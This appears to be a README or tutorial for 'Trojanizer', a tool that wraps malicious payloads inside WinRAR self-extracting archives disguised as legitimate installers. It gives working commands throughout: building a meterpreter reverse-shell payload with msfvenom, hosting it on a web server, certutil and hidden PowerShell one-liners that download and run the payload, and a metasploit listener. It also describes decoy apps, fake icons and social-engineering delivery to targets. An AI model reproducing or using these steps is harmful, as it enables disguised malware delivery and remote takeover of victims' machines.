Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
“Trojanizer.sh will download/install all dependencies as they are needed”
It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the ‘settings’ file before attempting to run the tool for the first time.
PAYLOADS (agents) ACCEPTED
.exe | .bat | .vbs | .ps1
“All payloads that windows/SFX can auto-extract-execute”
HINT: If sellected ‘SINGLE_EXEC=ON’ in the settings file, then trojanizer will accept any kind of extension to be inputed.
LEGIT APPLICATIONS ACCEPTED (decoys)
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
“All applications that windows/SFX can auto-extract-execute”
TROJANIZER AND APPL WHITELISTING BYPASSES
1º – use metasploit to build our payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º – copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe service apache2 start
3º – edit Trojanizer ‘settings’ file and activate:
4º – running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress) EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application) PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\payload.exe'; Start-Process '%TEMP%\payload.exe' SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created) REPLACE ICON => Windows-Store.ico OR Steam-logo.ico
5º – start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract ‘screenshot.png’ and ‘AngryBirds.exe’ (last one will be executed to serve as decoy)
The follow oneliner uses ‘powershell(Downloadfile+start)’ method to achieve the same as previous ‘certutil’ exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\payload.exe') & start '%TEMP%\payload.exe'
The follow oneliner uses ‘powershell(IEX+downloadstring)’ method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
1º - Download framework from github git clone https://github.com/r00t-3xp10it/trojanizer.git 2º - Set files execution permitions cd trojanizer sudo chmod +x *.sh 3º - config framework nano settings 4º - Run main tool sudo ./Trojanizer.sh
xsf.conf – execute both files upon extraction (trojan behavior)
Final sfx archive with icon changed
Inside the sfx archive (open with winrar) – trojan behavior
Inside the sfx archive (open with winrar) – single_file_execution
Trojanizer – single_file_execution (not trojan behavior)
Trojanizer – AVG anti-virus fake installer (trojan behavior)